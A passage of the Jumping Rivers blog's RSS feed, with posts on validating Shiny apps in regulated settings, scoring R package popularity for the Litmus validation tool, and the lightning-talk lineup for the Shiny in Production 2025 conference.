&lt;p&gt;Not every Shiny app is born equal. But some design choices from the start can make validation easier down the line:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Modular, testable code: Keep logic in functions, not tangled in &lt;code&gt;server.R&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Clear separation: UI, logic, and data should live in separate spaces.&lt;/li&gt;
&lt;li&gt;Version control: For both code and data.&lt;/li&gt;
&lt;li&gt;Reproducible environments: Ensure the development environment can be replicated.&lt;/li&gt;
&lt;li&gt;Minimal hidden state:Avoid global variables or side effects.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;These practices aren’t just about validation, they also make your codebase more maintainable and collaborative.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="common-pitfalls-and-how-to-avoid-them"&gt;Common Pitfalls (and How to Avoid Them)&lt;/h3&gt;
&lt;p&gt;As someone that has seen a lot of Shiny applications over the years, some common patterns come up again and again, especially when validating legacy apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hardcoded file paths that break in production&lt;/li&gt;
&lt;li&gt;Ad hoc data wrangling inside server functions&lt;/li&gt;
&lt;li&gt;Global variables causing unpredictable behavior&lt;/li&gt;
&lt;li&gt;No formal record of package dependencies&lt;/li&gt;
&lt;li&gt;No tests. No logs. No idea who changed what or why&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Sound familiar? You’re not alone. These are solvable problems, often with small changes that pay off in the long run.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="the-unique-challenge-of-shiny"&gt;The Unique Challenge of Shiny&lt;/h3&gt;
&lt;p&gt;Shiny is interactive by nature, which makes it harder to validate than static scripts. Here’s what makes it tricky and what to do about it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reactive chains hide logic. Break them down and add logging.&lt;/li&gt;
&lt;li&gt;User controlled outputs might produce unexpected results. Validate downloadable content and limit inputs.&lt;/li&gt;
&lt;li&gt;Deployment differences matter. Validate the version that’s actually in production.&lt;/li&gt;
&lt;li&gt;No audit trail by default. Packages like &lt;code&gt;{logger}&lt;/code&gt;, &lt;code&gt;{loggit}&lt;/code&gt;, or custom logging can give you a starting point.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;In Shiny apps, testing isn&amp;rsquo;t just about code, it&amp;rsquo;s about behavior. Think about what the user sees, clicks, and downloads. All of that needs to be validated.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="software-engineering-for-validation"&gt;Software Engineering for Validation&lt;/h3&gt;
&lt;p&gt;Good engineering habits go a long way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;{testthat}&lt;/code&gt; for logic&lt;/li&gt;
&lt;li&gt;Combine with &lt;code&gt;{shinytest2}&lt;/code&gt; for UI workflows&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;{lintr}&lt;/code&gt; and CI/CD pipelines to catch issues early&lt;/li&gt;
&lt;li&gt;Set up a code review process&lt;/li&gt;
&lt;li&gt;Automate documentation and testing reports&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that in mind, an example of a minimal validation stack could look something like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{testthat}&lt;/code&gt; for unit testing&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{shinytest2}&lt;/code&gt; for end to end checks&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{renv}&lt;/code&gt; or Docker for environments&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{logger}&lt;/code&gt; for audit trails&lt;/li&gt;
&lt;li&gt;GitHub Actions (or similar) for automation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Easier to implement when you build it in from the start.&lt;/p&gt;
&lt;h3 id="documentation-the-backbone-of-validation"&gt;Documentation: The Backbone of Validation&lt;/h3&gt;
&lt;p&gt;Documentation doesn’t have to be bureaucratic. It just has to be clear.&lt;/p&gt;
&lt;p&gt;A great way to get started would be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Functional Requirements Spec (FRS): What the app should do&lt;/li&gt;
&lt;li&gt;Test Plan &amp;amp; Summary (TP/TSR): How you know it does it&lt;/li&gt;
&lt;li&gt;README/User Guide: For both users and reviewers&lt;/li&gt;
&lt;li&gt;Audit trail: Who changed what, when, and why&lt;/li&gt;
&lt;li&gt;Reproducibility artifacts: renv.lock, Dockerfiles, Git commits&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-validating-shiny-apps-regulated-environments"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="matching-effort-to-risk"&gt;Matching Effort to Risk&lt;/h3&gt;
&lt;p&gt;Not every app needs the same level of scrutiny. That’s where a risk based approach comes in. (Risk Appetite)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Low risk: sandbox tools, exploratory dashboards → lighter touch&lt;/li&gt;
&lt;li&gt;High risk: decision support, outputs used in reports or submissions → full validation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Start by defining the app’s intended use, data sensitivity, and audience. It helps you make smart trade offs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“But it’s just an internal tool!”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Internal tools often evolve into production tools. Validation future proofs them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“It slows us down!”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Done right, validation saves time. It catches bugs early and reduces friction with compliance teams.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="tools-for-risk--security"&gt;Tools for Risk &amp;amp; Security&lt;/h3&gt;
&lt;p&gt;Beyond testing and documentation, assessing package level risk and security is essential, especially when your app depends on external libraries.&lt;/p&gt;
&lt;p&gt;There are some tools out there that can help with this, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pharmar.github.io/riskmetric/" rel="external"&gt;riskmetric&lt;/a&gt;: Evaluate risk across R packages using metrics like maintenance, documentation, and testing.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://sonatype-nexus-community.github.io/oysteR/" rel="external"&gt;oysteR&lt;/a&gt;: Scan R packages for known security vulnerabilities via CVEs.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt; – Compare changes between versions of R packages to identify what’s changed and what might break.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Litmus.dashboard&lt;/a&gt; – Explore package-level risk scores interactively and track changes over time.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="overview.png" alt="Litmus dashboard showing distribution of overall package scores" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="how-we-deal-with-shiny-validation-in-jumping-rivers"&gt;How we deal with Shiny Validation in Jumping Rivers&lt;/h3&gt;
&lt;p&gt;At Jumping Rivers, we&amp;rsquo;ve been validating R packages for quite some time now, and have in the meanwhile developed the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt;, a toolkit designed to make R package validation easier, more transparent, and aligned with regulatory expectations.&lt;/p&gt;
&lt;p&gt;But how is that related to Shiny Validation? While a Shiny app doesn’t &lt;strong&gt;have&lt;/strong&gt; to be a package, treating it as one simplifies validation &lt;strong&gt;a lot&lt;/strong&gt;. It lets us apply the same best practices used for standard R packages: version control, documentation, testing, and reproducible environments. From there, we just add application specific validation steps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Validate the Shiny application package dependencies using the Litmusverse workflow, using a scoring strategy that suits the application risk appetite.&lt;/li&gt;
&lt;li&gt;Validate the application code itself using a separate scoring strategy more focused on code quality, documentation and not on popularity or CRAN metrics as we would use for dependencies (Litmus allows for scoring strategies to be tweaked at will or even include custom metrics if needed).&lt;/li&gt;
&lt;li&gt;Generate a report with the validation results from both the dependencies validation and the application validation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;img src="litmus-workflow.png" alt="Litmus validation workflow" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h3 id="final-thoughts-start-validated-stay-validated"&gt;Final Thoughts: Start Validated, Stay Validated&lt;/h3&gt;
&lt;p&gt;The best time to think about validation is at the start of your project. The second best time is right now.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Build with validation in mind.&lt;/li&gt;
&lt;li&gt;Document as you go.&lt;/li&gt;
&lt;li&gt;Automate wherever possible.&lt;/li&gt;
&lt;li&gt;Choose tools that support transparency and traceability.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Validation isn’t a one time hurdle. It’s a habit you build with each commit, each test, each documented decision.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Validation isn’t a blocker, it’s a confidence booster. For you, your team, and your reviewers.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="get-in-touch"&gt;Get in Touch&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more about R validation and how it can be used to unleash the power of open source in your organisation, &lt;a href="https://www.jumpingrivers.com/contact/?subject=Litmus" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Package Popularity</title><link>https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/</link><pubDate>Thu, 26 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/downloads.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In our &lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;previous post&lt;/a&gt;,
we introduced the four components that make up a litmus package score: documentation, popularity, code quality, and maintenance.
In this post, we&amp;rsquo;ll look at package popularity.
Package popularity is an interesting, and sometimes controversial, measure.
In our experience it often sparks strong (and usually negative) reactions.
The idea is simple: if a package is widely used, bugs are more likely to be found and fixed, and if the maintainer steps away, there’s a higher chance someone else will take over.
Of course, high usage doesn’t mean a package is risk-free.
But popularity can provide helpful context.
Consider this example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{pkgA}&lt;/code&gt;: Extremely popular and a dependency for many other packages.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{pkgB}&lt;/code&gt;: Very few downloads and minimal usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In a situation like this, &lt;code&gt;{pkgA}&lt;/code&gt; may offer more stability over time, simply because more people rely on it.
It &lt;strong&gt;does&lt;/strong&gt; not mean that &lt;code&gt;{pkgA}&lt;/code&gt; is risk free, only that the risk is lower than &lt;code&gt;{pkgB}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;All other things being equal, if you had sixty minutes to assess both packages, would you spend thirty minutes on each, or weight your time to the &amp;ldquo;least popular&amp;rdquo; package?&lt;/p&gt;
&lt;p&gt;It’s important to keep in mind that &lt;strong&gt;statistical packages tend to be less popular than &amp;ldquo;foundational&amp;rdquo; ones&lt;/strong&gt;.
Packages for tasks like data wrangling, date-times, and plotting are used by nearly everyone, regardless of the use case.
In contrast, more specialised packages, for example, those designed to handle experimental designs with drop-outs, naturally have a smaller audience.&lt;/p&gt;
&lt;p&gt;So a lower popularity doesn’t necessarily reflect lower quality or usefulness. It may just reflect a more niche purpose.&lt;/p&gt;
&lt;h3 id="score-1-yearly-downloads"&gt;Score 1: Yearly Downloads&lt;/h3&gt;
&lt;p&gt;For packages on CRAN, we can obtain download statistics.
Of course, the obvious question is, &amp;ldquo;what is a large number of downloads?&amp;rdquo;
To answer this question, we obtained the download statistics of every package on CRAN, and used that data
as the basis of our score.&lt;/p&gt;
&lt;p&gt;More precisely, if a package is in the upper quartile for the number of package downloads (approximately 7,000 downloads per year),
the package is scored 1. Otherwise, the empirical CDF is used to score.&lt;/p&gt;
&lt;p&gt;&lt;img src="downloads.svg" alt="Score for Yearly downloads" style="width: 400px; display: block;
│ margin-left: auto; margin-right: auto"/&gt;&lt;/p&gt;
&lt;p&gt;Of course, you could choose a different period of time, say month, or a trend over time.
But our investigations suggest that while having a variety of scores based on downloads, very little new information is gained.
But there is an additional increase in complexity.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-popularity"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-2-reverse-dependencies"&gt;Score 2: Reverse Dependencies&lt;/h3&gt;
&lt;p&gt;We also examine the number of reverse dependencies, that is, how many other packages rely on it.
The reasoning is simple: if many packages depend on it, there&amp;rsquo;s a greater chance that bugs will be spotted and fixed.
It also suggests that other developers have reviewed and trusted the package enough to build on top of it.&lt;/p&gt;
&lt;p&gt;Similar to package downloads, we used all packages on CRAN as a basis for scoring.
Packages in the top quartile for reverse dependencies receive a score of 1.
All others are scored using the empirical cumulative distribution function (CDF).
In practice, this ends up behaving like a near-binary score, since only a small number of packages have significant reverse dependencies.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve selected five packages to illustrate these scores - the total litmus score is given in brackets:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{drat}&lt;/code&gt; (0.94): A fantastic little package that simplifies creating local R repositories.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt; (0.87): A useful utility package, for (precisely) measuring function calls in R.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{shinyjs}&lt;/code&gt; (0.90): Perform common useful JavaScript operations in Shiny apps, created by Dean Attali.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{tibble}&lt;/code&gt; (0.81): The cornerstone(?) of the tidyverse.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{tsibble}&lt;/code&gt; (0.80): Tibbles for time series.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All five packages, as we would expect, have a high overall litmus score; we didn&amp;rsquo;t want to pick on more risky packages!&lt;/p&gt;
&lt;p&gt;For package popularity, which makes up 15% of the total litmus score, all five packages selected, score a maximum of &lt;code&gt;1&lt;/code&gt; for downloads and reverse dependencies.
Potentially, we could change the score to make it a more &amp;ldquo;continuous&amp;rdquo; measure.
For example, the number of downloads for &lt;code&gt;{tibble}&lt;/code&gt; is always more than &lt;code&gt;{tsibble}&lt;/code&gt;, as the latter depends on the former.
However, the purpose of assessing packages, isn&amp;rsquo;t to provide a &lt;strong&gt;ranked list&lt;/strong&gt; of packages, it&amp;rsquo;s to identify packages that are potentially risky.
So having a more continuous measure isn&amp;rsquo;t that helpful.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We tend to think about package popularity as a way of crowd sourcing information about the package of interest.
As we&amp;rsquo;ve mentioned, it&amp;rsquo;s only a signal, and as such it only contributes to 15% of the overall litmus score.&lt;/p&gt;
&lt;!--
downloads = 0:1e4
dd = tibble::tibble(downloads = downloads,
score = litmus.score:::cran_metric(downloads, "downloads", TRUE))
library(ggplot2)
svglite::svglite(
"~/jumpingrivers/brand/corporate-website/content/blog/2025-litmus-scoring-popularity/downloads.svg",
bg = "transparent")
ggplot(dd, aes(downloads, score)) +
geom_line(lwd = 2, colour = "#490F3A") +
xlab("Yearly Downloads") +
ylab("Score") +
theme_minimal() +
annotate("text", x = 2900, y= 0.52, hjust = "inward",
label = "A package with 2,500 downloads \n scores 0.5.",
size = 7) +
annotate("text", x = 7000, y= 1.06, hjust = "outward",
label = "Over 7,000 downloads, \n scores 1",
size = 7) +
theme(text = element_text(size=24))
dev.off()
--&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Lightning Talk Lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/</link><pubDate>Tue, 24 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the lightning talks for this year&amp;rsquo;s
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;
conference! We&amp;rsquo;ve already announced the full length talks (25 minutes each) in
&lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/" rel="external"&gt;this blog&lt;/a&gt;. This blog however is all about
this year&amp;rsquo;s lightning talks session (5 minutes per talk).&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning talks&lt;/h3&gt;
&lt;h4 id="andreas-wolfsbauer---ages---austrian-agency-for-health-and-food-safety"&gt;&lt;a href="https://www.linkedin.com/in/andreas-wolfsbauer-18069827b/" rel="external"&gt;Andreas Wolfsbauer&lt;/a&gt; - &lt;a href="https://www.ages.at/en/" rel="external"&gt;AGES - Austrian Agency for Health and Food Safety&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Enhancing Epidemiological Surveillance with a Shiny Application for Standardized Data Analysis&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Agency for Health and Food Safety (AGES) is responsible for monitoring notifiable infectious diseases in Austria. Within the Institute for Surveillance &amp;amp; Infectious Disease Epidemiology, we have developed a Shiny application designed to provide standardized analysis and visualization of all (n=76) notifiable disease categories, by processing data from the epidemiological notification system of Austria.&lt;/p&gt;
&lt;p&gt;The application offers a dashboard that enables users to select specific diseases and visualize data through interactive plots. Features include filtering by year, federal state and age-group, facilitating descriptive epidemiological analysis of the notification data. An analysis tab allows users to apply custom filters and generate tailored plots, enhancing the depth of data exploration. Users can download all plots along with the underlying data and generate a PDF report. They also have the option to export filtered data as a CSV file for further use.
Further development plans include a starting page highlighting long-term trends, to provide a compact overview for quick identification of diseases with need of action. Additionally, we will create an information page, that shows disease-specific metadata, and analyses of seasonal trends.&lt;/p&gt;
&lt;p&gt;Furthermore, discussions are ongoing to develop a dashboard for broader accessibility, initially within the organization, with potential public access. Challenges encountered include optimizing application performance and availability, particularly given the constraints of utilizing the free version of Shiny Server. To address this, we are exploring parallel and asynchronous programming techniques to enhance efficiency and responsiveness. Additionally, we are evaluating deployment solutions such as ShinyProxy to improve multi-user access and scalability.&lt;/p&gt;
&lt;h4 id="david-carayon---inrae"&gt;&lt;a href="https://dcarayon.fr/" rel="external"&gt;David Carayon&lt;/a&gt; - &lt;a href="https://www.inrae.fr/en" rel="external"&gt;INRAE&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Rescuelog: a Shiny-Based Monitoring System for Lifeguards: Insights from Southwest France&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Drowning prevention on coastal beaches relies heavily on lifeguard vigilance and timely intervention. However, traditional rescue data collection methods often
suffer from inefficiencies, delayed reporting, and a lack of real-time analytics. To modernize lifeguard operations across the beaches of southwest France,
we developed an end-to-end open-source data pipeline powered by R, Shiny, and ruODK.&lt;/p&gt;
&lt;p&gt;At the core of this system is ruODK, an R package that facilitates seamless integration with Open Data Kit (ODK), a widely used tool for field data collection.
Lifeguards use tablets running ODK Collect to log rescue incidents in real time, which are then ingested directly into an R-managed database. The data is
processed, analyzed, and visualized through a Shiny dashboard, offering lifeguards and supervisors instant access to key operational insights, trend analysis,
predictive models and customizable reports.&lt;/p&gt;
&lt;p&gt;By leveraging R&amp;rsquo;s data manipulation capabilities (tidyverse) alongside Shiny&amp;rsquo;s interactivity, we achieved a fully automated and scalable monitoring system
that replaces paper-based logs with a dynamic, data-driven approach. Initial deployments in 2023 (on five beaches) demonstrated significant improvements
in efficiency and situational awareness, prompting an expansion to 80 beaches by 2025. The system’s open-source nature ensures cost-effectiveness,
reproducibility, and adaptability for other regions and applications.&lt;/p&gt;
&lt;p&gt;This project exemplifies how R and Shiny can power real-time decision-making in public safety operations. It also highlights the untapped potential of
ruODK for bridging field data collection with analytical pipelines—showcasing an impactful use case of Shiny in production.&lt;/p&gt;
&lt;h4 id="kia-mack---kent-wildlife-trust"&gt;&lt;a href="https://www.linkedin.com/in/kiamack/" rel="external"&gt;Kia Mack&lt;/a&gt; - &lt;a href="https://www.kentwildlifetrust.org.uk/" rel="external"&gt;Kent Wildlife Trust&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Building the Kent BNG Register: Shiny for UI-First Development in a Small Charity Tech Team&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R Shiny is a powerful and beginner-friendly tool for rapidly developing interactive applications, but is it the best choice for UI-first web design?&lt;/p&gt;
&lt;p&gt;In this talk, we share our experience building the Kent Biodiversity Net Gain Site Register, a user-authenticated web portal that links the demand and supply of biodiversity credits. We’ll discuss the ways in which Shiny was a great fit—allowing rapid prototyping, seamless integration with R’s
data analysis tools, and reactive programming. We’ll explore why it suited a small conservation charity with a two-person team, enabling us to
build a functional, data-driven application without the need for specialist web development skills.&lt;/p&gt;
&lt;p&gt;However, we’ll also examine its limitations, from performance bottlenecks to challenges in creating a polished, responsive UI. We’ll share the
strategies we used to overcome these issues, including optimising reactive dependencies, using custom CSS and JavaScript for a more refined
UI, implementing caching and database indexing to improve performance, and leveraging Shiny modules to enhance scalability.&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re considering Shiny for a large-scale project or looking for ways to improve an existing app, this talk will provide practical insights
into where Shiny excels and what can be learned from mainstream web development languages to improve our use of Shiny.&lt;/p&gt;
&lt;h4 id="natalia-petersen---nhs-england"&gt;&lt;a href="https://www.linkedin.com/in/natalia-petersen-385683131/" rel="external"&gt;Natalia Petersen&lt;/a&gt; - &lt;a href="https://digital.nhs.uk/ndrs" rel="external"&gt;NHS England&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Hackathon to Streamline the National Disease Registration Service Cancer Treatments Shiny App&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Cancer Treatments dashboard is an interactive tool, built in Shiny, produced by the National Disease Registration Service (NDRS), within NHS England. The Shiny app displays graphs and tables presenting statistics on surgery, chemotherapy, and radiotherapy treatments for patients diagnosed with cancer in England.&lt;/p&gt;
&lt;p&gt;Users can select to view the data by demographic factors such as ethnicity and stage at diagnosis, and by geography, via dropdown menus. The app is refreshed annually and is publicly available, aimed at supporting the understanding of cancer treatments for both technical and non-technical audiences. The previous Shiny code was long and repetitive, making it difficult to navigate, challenging to de-bug, time-consuming to run, and prone to human error due to limited automation.&lt;/p&gt;
&lt;p&gt;To address these concerns, whilst also delivering improvements to the user interface, the team took part in a targeted hackathon day where individuals each took on a specific workflow and set of objectives, guided by user feedback. The re-developed app is now built on the NDRS Shiny app template, ensuring consistent styling. Bespoke, reusable functions are sourced throughout the code, allowing for modularisation, and graphs are built using the Plotly
package to improve usability and interactivity. All code required for producing the publication is available on GitHub, increasing transparency and scope for reuse.&lt;/p&gt;
&lt;p&gt;Through collaborative effort, careful division of labour, communication in person and online, and application of Reproducible Analytical Pipeline principles we were able to successfully and quickly deliver improvements to the Shiny app, which will be published May 2025.&lt;/p&gt;
&lt;h4 id="rhian-davies---the-strategy-unit-nhs"&gt;&lt;a href="https://rhian.rbind.io/" rel="external"&gt;Rhian Davies&lt;/a&gt; - &lt;a href="https://www.strategyunitwm.nhs.uk/" rel="external"&gt;The Strategy Unit, NHS&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The Accidental Engineers: Managing Shiny Apps, Pipelines, and Tech Debt in the NHS&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How big should the hospitals of the future be? That’s the question we’re trying to answer. Our team has built a complex statistical model with over 100 parameters, using 140 million rows of patient data to help healthcare leaders plan for future demand. The model incorporates uncertainty, allowing users to explore different policy scenarios and compare their hospital against national benchmarks. But while the maths is complicated, the hardest part isn’t the modelling, it’s making sure everything keeps running smoothly.&lt;/p&gt;
&lt;p&gt;What started as a small data science project has grown into a sprawling web of interconnected tools, and some days, it feels like we’ve become accidental software engineers. Maintaining multiple Shiny apps, APIs, and pipelines across R, Python, and PySpark means we’re now juggling Databricks workflows, GitHub Actions, Azure Blob Storage, and Posit Connect deployments. Every month, we release a new version of the model while ensuring legacy versions are maintained and compatible. And with technical debt piling up, we’re starting to ask: do we keep patching things, or should we tear it all down and start again?&lt;/p&gt;
&lt;p&gt;This talk is an honest reflection on the challenges of managing large-scale Shiny apps in a high-pressure environment, how we balance new development with maintenance, and what we’ve learned along the way.
The code for all our tools is available publicly on GitHub.&lt;/p&gt;
&lt;h4 id="samer-hijjazi---md-anderson-cancer-center"&gt;&lt;a href="linkedin.com/in/samer-hijjazi"&gt;Samer Hijjazi&lt;/a&gt; - &lt;a href="https://www.mdanderson.org/" rel="external"&gt;MD Anderson Cancer Center&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;From Clicks to Insights: Harnessing RSelenium in R Shiny Applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This talk explores the opportunity to incorporate the RSelenium package into R Shiny applications. RSelenium is a package which allows users to perform web automation and advanced web scraping. In comparison to rvest, RSelenium can give you the ability to web scrape data from more difficult websites. This talk would teach the R community a lot about web automation, as well as showing another creative way of using R Shiny applications.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Validation and beyond!</title><link>https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/</link><pubDate>Thu, 19 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
